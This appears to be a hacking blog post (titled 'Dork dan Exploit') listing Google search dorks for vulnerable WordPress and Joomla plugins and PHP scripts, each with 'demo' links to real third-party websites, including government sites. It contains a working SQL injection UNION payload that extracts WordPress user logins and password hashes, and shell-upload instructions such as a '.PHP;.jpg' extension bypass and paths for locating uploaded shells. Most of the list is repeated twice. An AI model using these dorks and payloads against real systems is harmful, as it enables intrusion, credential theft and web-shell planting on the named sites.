Dork dan Exploit
1.Espacio Ecuador
[ dork ]
intext:"developed by Espacio Ecuador" inurl:id=
[ demo ]
http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25
[ details ]
http://cxsecurity.com/issue/WLB-2012110228
2. Seventeen Design
[ dork ]
intext:"Producido por: Seventeen Design." inurl:id=
[ demo ]
http://www.monteavila.gob.ve/mae/detail_new.php?id=147'
[ details ]
http://cxsecurity.com/issue/WLB-2012110225
3. Plugin Wordpress Newsletter
[ dork ]
allinurl:stnl_iframe.php?newsletter=
[ demo ]
http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7
4. Plugin Wodpress Wp- Imagezoon
[ dork ]
allinurl:wp-imagezoom/zoom.php?id=
[ demo ]
http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX
5. Wordpress Daily Edditionmouss
[ dork ]
inurl:fiche-artiste.php?id=
inurl:themes/dailyedition-mouss/fiche-artiste.php?id=
[ demo ]
http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383
6. Wp- Plugin" Plg_Novana"
[ dork ]
inurl:novana_detail.php?**id=
[ exploit ]
/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
[ demo ]
http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
[ detail ]
http://1337day.com/exploit/19787
7. Girl .php
[ dork ]
inurl:girl.php?id=
[ demo ]
http://www.btsfashionshow.com/girl.php?id=6
http://www.aramis-london-escorts.com/girl.php?id=301
http://www.pornescort.xxx/girl.php?id=68
8. Like .php
[ dork ]
inurl:like.php?id= intext:LikeItNow Script © 2010
[ demo ]
http://neonapster.net23.net/like.php?id=34%27
Tamper Data
1. Joomla Componen com_smartformer
[ dork ]
inurl:index.php?option=com_smartformer inurl:itemid= intext:Upload
[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
[ shell location ]
site/components/com_smartformer/files/yournameshell.php
[ details ]
http://1337day.com/exploit/19825
2. Plugin Wordpress Zarzadzanie Kontem (Ajax File Manager)
[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5
3.Wp- Plugin "tdo-mini-form"
[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
[ details ]
http://1337day.com/exploit/19776
4.JQuery File Upload
[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html
[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg
5. Upload Tiny Browser
[new dork ]
inurl:tinybrowser/upload.php
intitle:Index of / intext:Parent Directory "tinybrowser/"
inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
[ details ]
http://1337day.com/exploit/19732
6. Joomla File Upload "com_autostand"
[dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car
inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
inurl:index.php?option=com_autostand
[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem
[ demo ]
http://www.karahan.be/index.php?option=com_autostand&func=newItem
TAMPER DATA & SHELL UPLOAD
1. Plugin Spot Light
[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
inurl:wp-content/plugins/spotlightyour/
[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/
[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php
[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/
[ dork ]
intext:"developed by Espacio Ecuador" inurl:id=
[ demo ]
http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25
[ details ]
http://cxsecurity.com/issue/WLB-2012110228
2. Seventeen Design
[ dork ]
intext:"Producido por: Seventeen Design." inurl:id=
[ demo ]
http://www.monteavila.gob.ve/mae/detail_new.php?id=147'
[ details ]
http://cxsecurity.com/issue/WLB-2012110225
3. Plugin Wordpress Newsletter
[ dork ]
allinurl:stnl_iframe.php?newsletter=
[ demo ]
http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7
4. Plugin Wodpress Wp- Imagezoon
[ dork ]
allinurl:wp-imagezoom/zoom.php?id=
[ demo ]
http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX
5. Wordpress Daily Edditionmouss
[ dork ]
inurl:fiche-artiste.php?id=
inurl:themes/dailyedition-mouss/fiche-artiste.php?id=
[ demo ]
http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383
6. Wp- Plugin" Plg_Novana"
[ dork ]
inurl:novana_detail.php?**id=
[ exploit ]
/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
[ demo ]
http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
[ detail ]
http://1337day.com/exploit/19787
7. Girl .php
[ dork ]
inurl:girl.php?id=
[ demo ]
http://www.btsfashionshow.com/girl.php?id=6
http://www.aramis-london-escorts.com/girl.php?id=301
http://www.pornescort.xxx/girl.php?id=68
8. Like .php
[ dork ]
inurl:like.php?id= intext:LikeItNow Script © 2010
[ demo ]
http://neonapster.net23.net/like.php?id=34%27
Tamper Data
1. Joomla Componen com_smartformer
[ dork ]
inurl:index.php?option=com_smartformer inurl:itemid= intext:Upload
[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
[ shell location ]
site/components/com_smartformer/files/yournameshell.php
[ details ]
http://1337day.com/exploit/19825
2. Plugin Wordpress Zarzadzanie Kontem (Ajax File Manager)
[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5
3.Wp- Plugin "tdo-mini-form"
[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
[ details ]
http://1337day.com/exploit/19776
4.JQuery File Upload
[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html
[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg
5. Upload Tiny Browser
[new dork ]
inurl:tinybrowser/upload.php
intitle:Index of / intext:Parent Directory "tinybrowser/"
inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
[ details ]
http://1337day.com/exploit/19732
6. Joomla File Upload "com_autostand"
[dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car
inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
inurl:index.php?option=com_autostand
[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem
[ demo ]
http://www.karahan.be/index.php?option=com_autostand&func=newItem
TAMPER DATA & SHELL UPLOAD
1. Plugin Spot Light
[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
inurl:wp-content/plugins/spotlightyour/
[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/
[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php
[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.